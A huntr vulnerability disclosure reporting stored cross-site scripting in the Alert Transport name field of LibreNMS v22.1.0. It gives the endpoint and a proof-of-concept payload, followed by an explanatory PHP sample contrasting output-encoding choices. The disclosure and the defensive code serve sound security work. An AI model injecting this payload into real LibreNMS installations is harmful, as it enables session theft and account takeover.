huntr | faisalfs10x | 114BA055-A2F0-4DB9-AAFB-95DF944BA177
History: Feb 12, 2022 - 9:28 p.m.

Cross-site Scripting (XSS) - Generic in librenms/librenms

2022-02-12 21:28:19
faisalfs10x
www.huntr.dev
EPSS: 0.001 (Low), percentile 34.3%

Description

A cross-site scripting vulnerability in LibreNMS v22.1.0 allows attackers to execute arbitrary JavaScript code. It affects the Transport name field of the Alerts module (Alert Transport).

Proof of Concept

Endpoint:

POST http://{HOST}/ajax_form.php - Parameter: name

Payload:

'><body onload=alert("TName")>

The XSS fires when a user visits:

http://{HOST}/alert-transports

PoC images:

1 payload

2 XSS-Name field

Impact

This vulnerability allows malicious JavaScript code to run on web pages, stealing a user’s cookie and gaining unauthorized access to that user’s account through the stolen cookie.
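
The flaw described above is a stored value rendered without HTML encoding. The following PHP example is added here and is not code from LibreNMS or from the report: the `cell` markup and all function names are hypothetical, and the single-quoted attribute sink is an assumption based on the payload's leading `'>`. It contrasts no encoding, quote-unaware encoding and `ENT_QUOTES` encoding of the reported transport name.

```php
<?php
declare(strict_types=1);

// Constructed sample: the transport name from the report, as a stored value.
$storedName = '\'><body onload=alert("TName")>';

// Hypothetical list-view cell that places the name in a single-quoted attribute.
function cell(string $value): string
{
    return "<td><span title='" . $value . "'>" . $value . "</span></td>";
}

// Vulnerable pattern: the stored value reaches the markup unchanged.
function encode_none(string $name): string
{
    return $name;
}

// Incomplete fix: ENT_COMPAT encodes & < > " but not ', so the value can
// still close a single-quoted attribute. This was PHP's default before 8.1.
function encode_compat(string $name): string
{
    return htmlspecialchars($name, ENT_COMPAT, 'UTF-8');
}

// Hardened: ENT_QUOTES also encodes ', and ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function encode_quotes(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True when the encoded value cannot leave the attribute or open a tag.
function is_inert(string $encoded): bool
{
    return strpbrk($encoded, "'\"<>") === false;
}

foreach (['encode_none', 'encode_compat', 'encode_quotes'] as $encoder) {
    $encoded = $encoder($storedName);
    printf("%-14s inert=%-3s %s\n", $encoder, is_inert($encoded) ? 'yes' : 'no', cell($encoded));
}
```

Only the `encode_quotes` row reports the value as inert; the `encode_compat` row shows why encoding must match the quoting style of the attribute it is written into.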
